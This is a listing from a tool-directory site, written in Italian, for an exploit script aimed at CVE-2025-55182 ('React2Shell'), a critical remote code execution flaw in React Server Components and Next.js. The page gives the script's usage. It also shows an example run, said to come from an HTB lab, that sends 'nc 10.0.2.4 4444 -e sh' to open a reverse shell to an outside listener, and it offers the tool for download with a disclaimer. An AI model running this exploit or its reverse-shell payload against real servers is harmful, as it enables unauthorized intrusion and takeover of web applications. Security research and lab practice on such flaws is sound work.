Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182-React2Shell — CVE-2025-55182 Exploit | di infrar3d | Kitploit
Strumenti/GitHubGitHub/industri4l-h3ll-xpl0it3rs/cve-2025-55182-react2shell
Generazione di PayloadExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneStrumento di Accesso Remoto
GitHubindustri4l-h3ll-xpl0it3rs/cve-2025-55182-react2shell

CVE-2025-55182-React2Shell

CVE-2025-55182 Exploit | di infrar3d

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
3 mesi faNon ancora revisionato

CVE-2025-55182-React2Shell

xpl0itata da infrar3d

Una vulnerabilità di gravità critica 10.0 che colpisce l'uso lato server di React.js, tracciata come CVE-2025-55182 in React.js e CVE-2025-66478 specificamente per il framework Next.js.

Questa vulnerabilità è stata divulgata in modo responsabile da Lachlan Davidson il 29 novembre 2025 PT al team di Meta. La divulgazione iniziale e il rilascio della patch sono stati eseguiti da React e Vercel il 3 dicembre 2025 PT. (Originale: https://react2shell.com/)

Utilizzo:

root@kitploit:~
python3 CVE-2025-55182.py --help 
usage: python CVE-2025-55182.py -u <URL> [-c COMMAND]

CVE-2025-55182 - React Server Components RCE Exploit

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target URL (required)
  -c, --command COMMAND
                        Command to execute on target (default: id)

Example: python CVE-2025-55182.py -u http://target.com -c "whoami"


Esempio (testato su task HTB):

root@kitploit:~
python3 CVE-2025-55182.py -u http://154.57.164.73:30507 -c "nc 10.0.2.4 4444 -e sh"

⚠️ Dichiarazione di non responsabilità ⚠️

Questo software e il codice proof-of-concept sono forniti solo a scopo educativo e di ricerca.

  • Gli autori non sono responsabili per qualsiasi uso improprio o danno causato da questo programma.
  • Non utilizzarlo contro alcun sistema senza un'esplicita autorizzazione preventiva.
  • L'uso di questo strumento per attaccare target senza consenso è illegale.

Sei responsabile del rispetto di tutte le leggi applicabili. Usalo in modo etico e responsabile.

Scarica lo strumento